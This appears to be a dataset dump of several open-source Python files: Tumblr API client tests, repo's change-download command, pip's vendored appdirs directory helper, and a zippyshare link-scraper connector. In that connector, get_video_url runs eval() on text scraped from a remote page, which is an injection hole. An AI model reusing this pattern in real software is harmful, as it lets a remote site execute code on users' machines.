'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.edit_post('seejohnrun', id='123', state='coolguy', tags=['hello', 'world'])
assert response == []
assert parse_qs(mock_post.data) == parse_qs('state=coolguy&id=123&tags=hello%2Cworld')
@mock.patch('requests.post')
def test_like(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.like('123', "adsfsadf")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('id=123&reblog_key=adsfsadf')
@mock.patch('requests.post')
def test_unlike(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 200, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.unlike('123', "adsfsadf")
assert response == []
assert parse_qs(mock_post.data) == parse_qs('id=123&reblog_key=adsfsadf')
@mock.patch('requests.get')
def test_info(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.info()
assert response == []
@mock.patch('requests.get')
def test_likes(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.likes()
assert response == []
@mock.patch('requests.get')
def test_likes_with_after(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.likes(after=1418684291)
assert response == []
@mock.patch('requests.get')
def test_likes_with_before(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.likes(before=1418684291)
assert response == []
@mock.patch('requests.get')
def test_following(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.following()
assert response == []
@mock.patch('requests.get')
def test_tagged(self, mock_get):
mock_get.side_effect = wrap_response('{"meta": {"status": 200, "msg": "OK"}, "response": []}')
response = self.client.tagged('food')
assert response == []
@mock.patch('requests.post')
def test_create_text(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_text('codingjester.tumblr.com', body="Testing")
assert response == []
@mock.patch('requests.post')
def test_create_link(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 201, "msg": "OK"}, "response": []}',
mock_post)
response = self.client.create_link('codingjester.tumblr.com', url="https://google.com", tags=['omg', 'nice'])
assert response == []
assert parse_qs(mock_post.data) == parse_qs('url=https%3A%2F%2Fgoogle.com&type=link&tags=omg%2Cnice')
@mock.patch('requests.post')
def test_no_tags(self, mock_post):
mock_post.side_effect = wrap_response_storing_data(
'{"meta": {"status": 201, "msg": "OK"}, "response": []}',
mock_post)
self.client.create_link('seejohnrun.tumblr.com', tags=[])
assert parse_qs(mock_post.data) == parse_qs('type=link&tags=')
@mock.patch('requests.post')
def test_create_quote(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_quote('codingjester.tumblr.com', quote="It's better to love and lost, than never have loved at all.")
assert response == []
@mock.patch('requests.post')
def test_create_chat(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_chat('codingjester.tumblr.com', conversation="JB: Testing is rad.\nJC: Hell yeah.")
assert response == []
@mock.patch('requests.post')
def test_create_photo(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_photo('codingjester.tumblr.com', source="https://media.tumblr.com/image.jpg")
assert response == []
@mock.patch('requests.post')
def test_create_audio(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_audio('codingjester.tumblr.com', external_url="https://media.tumblr.com/audio.mp3")
assert response == []
@mock.patch('requests.post')
def test_create_video(self, mock_post):
mock_post.side_effect = wrap_response('{"meta": {"status": 201, "msg": "OK"}, "response": []}')
response = self.client.create_video('codingjester.tumblr.com', embed="blahblahembed")
assert response == []
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
nuclearmistake/repo
|
subcmds/download.py
|
3
|
3325
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import re
import sys
from command import Command
from error import GitError
CHANGE_RE = re.compile(r'^([1-9][0-9]*)(?:[/\.-]([1-9][0-9]*))?$')
class Download(Command):
common = True
helpSummary = "Download and checkout a change"
helpUsage = """
%prog {[project] change[/patchset]}...
"""
helpDescription = """
The '%prog' command downloads a change from the review system and
makes it available in your project's local working directory.
If no project is specified try to use current directory as a project.
"""
def _Options(self, p):
p.add_option('-c', '--cherry-pick',
dest='cherrypick', action='store_true',
help="cherry-pick instead of checkout")
p.add_option('-r', '--revert',
dest='revert', action='store_true',
help="revert instead of checkout")
p.add_option('-f', '--ff-only',
dest='ffonly', action='store_true',
help="force fast-forward merge")
def _ParseChangeIds(self, args):
if not args:
self.Usage()
to_get = []
project = None
for a in args:
m = CHANGE_RE.match(a)
if m:
if not project:
project = self.GetProjects(".")[0]
chg_id = int(m.group(1))
if m.group(2):
ps_id = int(m.group(2))
else:
ps_id = 1
to_get.append((project, chg_id, ps_id))
else:
project = self.GetProjects([a])[0]
return to_get
def Execute(self, opt, args):
for project, change_id, ps_id in self._ParseChangeIds(args):
dl = project.DownloadPatchSet(change_id, ps_id)
if not dl:
print('[%s] change %d/%d not found'
% (project.name, change_id, ps_id),
file=sys.stderr)
sys.exit(1)
if not opt.revert and not dl.commits:
print('[%s] change %d/%d has already been merged'
% (project.name, change_id, ps_id),
file=sys.stderr)
continue
if len(dl.commits) > 1:
print('[%s] %d/%d depends on %d unmerged changes:' \
% (project.name, change_id, ps_id, len(dl.commits)),
file=sys.stderr)
for c in dl.commits:
print(' %s' % (c), file=sys.stderr)
if opt.cherrypick:
try:
project._CherryPick(dl.commit)
except GitError:
print('[%s] Could not complete the cherry-pick of %s' \
% (project.name, dl.commit), file=sys.stderr)
sys.exit(1)
elif opt.revert:
project._Revert(dl.commit)
elif opt.ffonly:
project._FastForward(dl.commit, ffonly=True)
else:
project._Checkout(dl.commit)
|
apache-2.0
|
pradyunsg/pip
|
src/pip/_vendor/appdirs.py
|
22
|
25907
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2005-2010 ActiveState Software Inc.
# Copyright (c) 2013 Eddy Petrișor
"""Utilities for determining application-specific dirs.
See <http://github.com/ActiveState/appdirs> for details and usage.
"""
# Dev Notes:
# - MSDN on where to store app data files:
# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120
# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html
# - XDG spec for Un*x: http://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html
__version__ = "1.4.4"
__version_info__ = tuple(int(segment) for segment in __version__.split("."))
import sys
import os
PY3 = sys.version_info[0] == 3
if PY3:
unicode = str
if sys.platform.startswith('java'):
import platform
os_name = platform.java_ver()[3][0]
if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc.
system = 'win32'
elif os_name.startswith('Mac'): # "Mac OS X", etc.
system = 'darwin'
else: # "Linux", "SunOS", "FreeBSD", etc.
# Setting this to "linux2" is not ideal, but only Windows or Mac
# are actually checked for and the rest of the module expects
# *sys.platform* style strings.
system = 'linux2'
elif sys.platform == 'cli' and os.name == 'nt':
# Detect Windows in IronPython to match pip._internal.utils.compat.WINDOWS
# Discussion: <https://github.com/pypa/pip/pull/7501>
system = 'win32'
else:
system = sys.platform
def user_data_dir(appname=None, appauthor=None, version=None, roaming=False):
r"""Return full path to the user-specific data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user data directories are:
Mac OS X: ~/Library/Application Support/<AppName> # or ~/.config/<AppName>, if the other does not exist
Unix: ~/.local/share/<AppName> # or in $XDG_DATA_HOME, if defined
Win XP (not roaming): C:\Documents and Settings\<username>\Application Data\<AppAuthor>\<AppName>
Win XP (roaming): C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>
Win 7 (not roaming): C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>
Win 7 (roaming): C:\Users\<username>\AppData\Roaming\<AppAuthor>\<AppName>
For Unix, we follow the XDG spec and support $XDG_DATA_HOME.
That means, by default "~/.local/share/<AppName>".
"""
if system == "win32":
if appauthor is None:
appauthor = appname
const = roaming and "CSIDL_APPDATA" or "CSIDL_LOCAL_APPDATA"
path = os.path.normpath(_get_win_folder(const))
if appname:
if appauthor is not False:
path = os.path.join(path, appauthor, appname)
else:
path = os.path.join(path, appname)
elif system == 'darwin':
path = os.path.expanduser('~/Library/Application Support/')
if appname:
path = os.path.join(path, appname)
else:
path = os.getenv('XDG_DATA_HOME', os.path.expanduser("~/.local/share"))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
def site_data_dir(appname=None, appauthor=None, version=None, multipath=False):
r"""Return full path to the user-shared data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"multipath" is an optional parameter only applicable to *nix
which indicates that the entire list of data dirs should be
returned. By default, the first item from XDG_DATA_DIRS is
returned, or '/usr/local/share/<AppName>',
if XDG_DATA_DIRS is not set
Typical site data directories are:
Mac OS X: /Library/Application Support/<AppName>
Unix: /usr/local/share/<AppName> or /usr/share/<AppName>
Win XP: C:\Documents and Settings\All Users\Application Data\<AppAuthor>\<AppName>
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.)
Win 7: C:\ProgramData\<AppAuthor>\<AppName> # Hidden, but writeable on Win 7.
For Unix, this is using the $XDG_DATA_DIRS[0] default.
WARNING: Do not use this on Windows. See the Vista-Fail note above for why.
"""
if system == "win32":
if appauthor is None:
appauthor = appname
path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA"))
if appname:
if appauthor is not False:
path = os.path.join(path, appauthor, appname)
else:
path = os.path.join(path, appname)
elif system == 'darwin':
path = os.path.expanduser('/Library/Application Support')
if appname:
path = os.path.join(path, appname)
else:
# XDG default for $XDG_DATA_DIRS
# only first, if multipath is False
path = os.getenv('XDG_DATA_DIRS',
os.pathsep.join(['/usr/local/share', '/usr/share']))
pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)]
if appname:
if version:
appname = os.path.join(appname, version)
pathlist = [os.path.join(x, appname) for x in pathlist]
if multipath:
path = os.pathsep.join(pathlist)
else:
path = pathlist[0]
return path
if appname and version:
path = os.path.join(path, version)
return path
def user_config_dir(appname=None, appauthor=None, version=None, roaming=False):
r"""Return full path to the user-specific config dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user config directories are:
Mac OS X: same as user_data_dir
Unix: ~/.config/<AppName> # or in $XDG_CONFIG_HOME, if defined
Win *: same as user_data_dir
For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME.
That means, by default "~/.config/<AppName>".
"""
if system in ["win32", "darwin"]:
path = user_data_dir(appname, appauthor, None, roaming)
else:
path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser("~/.config"))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
# for the discussion regarding site_config_dir locations
# see <https://github.com/pypa/pip/issues/1733>
def site_config_dir(appname=None, appauthor=None, version=None, multipath=False):
r"""Return full path to the user-shared data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"multipath" is an optional parameter only applicable to *nix
which indicates that the entire list of config dirs should be
returned. By default, the first item from XDG_CONFIG_DIRS is
returned, or '/etc/xdg/<AppName>', if XDG_CONFIG_DIRS is not set
Typical site config directories are:
Mac OS X: same as site_data_dir
Unix: /etc/xdg/<AppName> or $XDG_CONFIG_DIRS[i]/<AppName> for each value in
$XDG_CONFIG_DIRS
Win *: same as site_data_dir
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.)
For Unix, this is using the $XDG_CONFIG_DIRS[0] default, if multipath=False
WARNING: Do not use this on Windows. See the Vista-Fail note above for why.
"""
if system in ["win32", "darwin"]:
path = site_data_dir(appname, appauthor)
if appname and version:
path = os.path.join(path, version)
else:
# XDG default for $XDG_CONFIG_DIRS (missing or empty)
# see <https://github.com/pypa/pip/pull/7501#discussion_r360624829>
# only first, if multipath is False
path = os.getenv('XDG_CONFIG_DIRS') or '/etc/xdg'
pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep) if x]
if appname:
if version:
appname = os.path.join(appname, version)
pathlist = [os.path.join(x, appname) for x in pathlist]
if multipath:
path = os.pathsep.join(pathlist)
else:
path = pathlist[0]
return path
def user_cache_dir(appname=None, appauthor=None, version=None, opinion=True):
r"""Return full path to the user-specific cache dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"opinion" (boolean) can be False to disable the appending of
"Cache" to the base app data dir for Windows. See
discussion below.
Typical user cache directories are:
Mac OS X: ~/Library/Caches/<AppName>
Unix: ~/.cache/<AppName> (XDG default)
Win XP: C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>\Cache
Vista: C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>\Cache
On Windows the only suggestion in the MSDN docs is that local settings go in
the `CSIDL_LOCAL_APPDATA` directory. This is identical to the non-roaming
app data dir (the default returned by `user_data_dir` above). Apps typically
put cache data somewhere *under* the given dir here. Some examples:
...\Mozilla\Firefox\Profiles\<ProfileName>\Cache
...\Acme\SuperApp\Cache\1.0
OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value.
This can be disabled with the `opinion=False` option.
"""
if system == "win32":
if appauthor is None:
appauthor = appname
path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))
# When using Python 2, return paths as bytes on Windows like we do on
# other operating systems. See helper function docs for more details.
if not PY3 and isinstance(path, unicode):
path = _win_path_to_bytes(path)
if appname:
if appauthor is not False:
path = os.path.join(path, appauthor, appname)
else:
path = os.path.join(path, appname)
if opinion:
path = os.path.join(path, "Cache")
elif system == 'darwin':
path = os.path.expanduser('~/Library/Caches')
if appname:
path = os.path.join(path, appname)
else:
path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache'))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
def user_state_dir(appname=None, appauthor=None, version=None, roaming=False):
r"""Return full path to the user-specific state dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user state directories are:
Mac OS X: same as user_data_dir
Unix: ~/.local/state/<AppName> # or in $XDG_STATE_HOME, if defined
Win *: same as user_data_dir
For Unix, we follow this Debian proposal <https://wiki.debian.org/XDGBaseDirectorySpecification#state>
to extend the XDG spec and support $XDG_STATE_HOME.
That means, by default "~/.local/state/<AppName>".
"""
if system in ["win32", "darwin"]:
path = user_data_dir(appname, appauthor, None, roaming)
else:
path = os.getenv('XDG_STATE_HOME', os.path.expanduser("~/.local/state"))
if appname:
path = os.path.join(path, appname)
if appname and version:
path = os.path.join(path, version)
return path
def user_log_dir(appname=None, appauthor=None, version=None, opinion=True):
r"""Return full path to the user-specific log dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"appauthor" (only used on Windows) is the name of the
appauthor or distributing body for this application. Typically
it is the owning company name. This falls back to appname. You may
pass False to disable it.
"version" is an optional version path element to append to the
path. You might want to use this if you want multiple versions
of your app to be able to run independently. If used, this
would typically be "<major>.<minor>".
Only applied when appname is present.
"opinion" (boolean) can be False to disable the appending of
"Logs" to the base app data dir for Windows, and "log" to the
base cache dir for Unix. See discussion below.
Typical user log directories are:
Mac OS X: ~/Library/Logs/<AppName>
Unix: ~/.cache/<AppName>/log # or under $XDG_CACHE_HOME if defined
Win XP: C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>\Logs
Vista: C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>\Logs
On Windows the only suggestion in the MSDN docs is that local settings
go in the `CSIDL_LOCAL_APPDATA` directory. (Note: I'm interested in
examples of what some windows apps use for a logs dir.)
OPINION: This function appends "Logs" to the `CSIDL_LOCAL_APPDATA`
value for Windows and appends "log" to the user cache dir for Unix.
This can be disabled with the `opinion=False` option.
"""
if system == "darwin":
path = os.path.join(
os.path.expanduser('~/Library/Logs'),
appname)
elif system == "win32":
path = user_data_dir(appname, appauthor, version)
version = False
if opinion:
path = os.path.join(path, "Logs")
else:
path = user_cache_dir(appname, appauthor, version)
version = False
if opinion:
path = os.path.join(path, "log")
if appname and version:
path = os.path.join(path, version)
return path
class AppDirs(object):
"""Convenience wrapper for getting application dirs."""
def __init__(self, appname=None, appauthor=None, version=None,
roaming=False, multipath=False):
self.appname = appname
self.appauthor = appauthor
self.version = version
self.roaming = roaming
self.multipath = multipath
@property
def user_data_dir(self):
return user_data_dir(self.appname, self.appauthor,
version=self.version, roaming=self.roaming)
@property
def site_data_dir(self):
return site_data_dir(self.appname, self.appauthor,
version=self.version, multipath=self.multipath)
@property
def user_config_dir(self):
return user_config_dir(self.appname, self.appauthor,
version=self.version, roaming=self.roaming)
@property
def site_config_dir(self):
return site_config_dir(self.appname, self.appauthor,
version=self.version, multipath=self.multipath)
@property
def user_cache_dir(self):
return user_cache_dir(self.appname, self.appauthor,
version=self.version)
@property
def user_state_dir(self):
return user_state_dir(self.appname, self.appauthor,
version=self.version)
@property
def user_log_dir(self):
return user_log_dir(self.appname, self.appauthor,
version=self.version)
#---- internal support stuff
def _get_win_folder_from_registry(csidl_name):
"""This is a fallback technique at best. I'm not sure if using the
registry for this guarantees us the correct answer for all CSIDL_*
names.
"""
if PY3:
import winreg as _winreg
else:
import _winreg
shell_folder_name = {
"CSIDL_APPDATA": "AppData",
"CSIDL_COMMON_APPDATA": "Common AppData",
"CSIDL_LOCAL_APPDATA": "Local AppData",
}[csidl_name]
key = _winreg.OpenKey(
_winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
)
dir, type = _winreg.QueryValueEx(key, shell_folder_name)
return dir
def _get_win_folder_with_pywin32(csidl_name):
from win32com.shell import shellcon, shell
dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0)
# Try to make this a unicode path because SHGetFolderPath does
# not return unicode strings when there is unicode data in the
# path.
try:
dir = unicode(dir)
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in dir:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
try:
import win32api
dir = win32api.GetShortPathName(dir)
except ImportError:
pass
except UnicodeError:
pass
return dir
def _get_win_folder_with_ctypes(csidl_name):
import ctypes
csidl_const = {
"CSIDL_APPDATA": 26,
"CSIDL_COMMON_APPDATA": 35,
"CSIDL_LOCAL_APPDATA": 28,
}[csidl_name]
buf = ctypes.create_unicode_buffer(1024)
ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf)
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in buf:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
buf2 = ctypes.create_unicode_buffer(1024)
if ctypes.windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024):
buf = buf2
return buf.value
def _get_win_folder_with_jna(csidl_name):
import array
from com.sun import jna
from com.sun.jna.platform import win32
buf_size = win32.WinDef.MAX_PATH * 2
buf = array.zeros('c', buf_size)
shell = win32.Shell32.INSTANCE
shell.SHGetFolderPath(None, getattr(win32.ShlObj, csidl_name), None, win32.ShlObj.SHGFP_TYPE_CURRENT, buf)
dir = jna.Native.toString(buf.tostring()).rstrip("\0")
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in dir:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
buf = array.zeros('c', buf_size)
kernel = win32.Kernel32.INSTANCE
if kernel.GetShortPathName(dir, buf, buf_size):
dir = jna.Native.toString(buf.tostring()).rstrip("\0")
return dir
if system == "win32":
try:
from ctypes import windll
_get_win_folder = _get_win_folder_with_ctypes
except ImportError:
try:
import com.sun.jna
_get_win_folder = _get_win_folder_with_jna
except ImportError:
_get_win_folder = _get_win_folder_from_registry
def _win_path_to_bytes(path):
"""Encode Windows paths to bytes. Only used on Python 2.
Motivation is to be consistent with other operating systems where paths
are also returned as bytes. This avoids problems mixing bytes and Unicode
elsewhere in the codebase. For more details and discussion see
<https://github.com/pypa/pip/issues/3463>.
If encoding using ASCII and MBCS fails, return the original Unicode path.
"""
for encoding in ('ASCII', 'MBCS'):
try:
return path.encode(encoding)
except (UnicodeEncodeError, LookupError):
pass
return path
#---- self test code
if __name__ == "__main__":
appname = "MyApp"
appauthor = "MyCompany"
props = ("user_data_dir",
"user_config_dir",
"user_cache_dir",
"user_state_dir",
"user_log_dir",
"site_data_dir",
"site_config_dir")
print("-- app dirs %s --" % __version__)
print("-- app dirs (with optional 'version')")
dirs = AppDirs(appname, appauthor, version="1.0")
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
print("\n-- app dirs (without optional 'version')")
dirs = AppDirs(appname, appauthor)
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
print("\n-- app dirs (without optional 'appauthor')")
dirs = AppDirs(appname)
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
print("\n-- app dirs (with disabled 'appauthor')")
dirs = AppDirs(appname, appauthor=False)
for prop in props:
print("%s: %s" % (prop, getattr(dirs, prop)))
|
mit
|
superberny70/pelisalacarta
|
python/main-classic/servers/zippyshare.py
|
2
|
2457
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para zippyshare
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
import re
from core import httptools
from core import logger
from core import scrapertools
def test_video_exists(page_url):
result = False
message = ''
try:
error_message_file_not_exists = 'File does not exist on this server'
error_message_file_deleted = 'File has expired and does not exist anymore on this server'
data = httptools.downloadpage(page_url).data
if error_message_file_not_exists in data:
message = 'File does not exist.'
elif error_message_file_deleted in data:
message = 'File deleted.'
else:
result = True
except Exception as ex:
message = ex.message
return result, message
def get_video_url(page_url, premium=False, user="", password="", video_password=""):
logger.info("(page_url='%s')" % page_url)
video_urls = []
data = httptools.downloadpage(page_url).data
match = re.search('(.+)/v/(\w+)/file.html', page_url)
domain = match.group(1)
patron = 'getElementById\(\'dlbutton\'\).href\s*=\s*(.*?);'
media_url = scrapertools.find_single_match(data, patron)
numbers = scrapertools.find_single_match(media_url, '\((.*?)\)')
url = media_url.replace(numbers, "'%s'" % eval(numbers))
url = eval(url)
mediaurl = '%s%s' % (domain, url)
extension = "." + mediaurl.split('.')[-1]
video_urls.append([extension + " [zippyshare]", mediaurl])
return video_urls
# Encuentra vídeos del servidor en el texto pasado
def find_videos(data):
encontrados = set()
devuelve = []
# http://www5.zippyshare.com/v/11178679/file.html
# http://www52.zippyshare.com/v/hPYzJSWA/file.html
patronvideos = '([a-z0-9]+\.zippyshare.com/v/[A-z0-9]+/file.html)'
logger.info("#" + patronvideos + "#")
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for match in matches:
titulo = "[zippyshare]"
url = "http://" + match
if url not in encontrados:
logger.info(" url=" + url)
devuelve.append([titulo, url, 'zippyshare'])
encontrados.add(url)
else:
logger.info(" url duplicada=" + url)
return devuelve
|
gpl-3.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.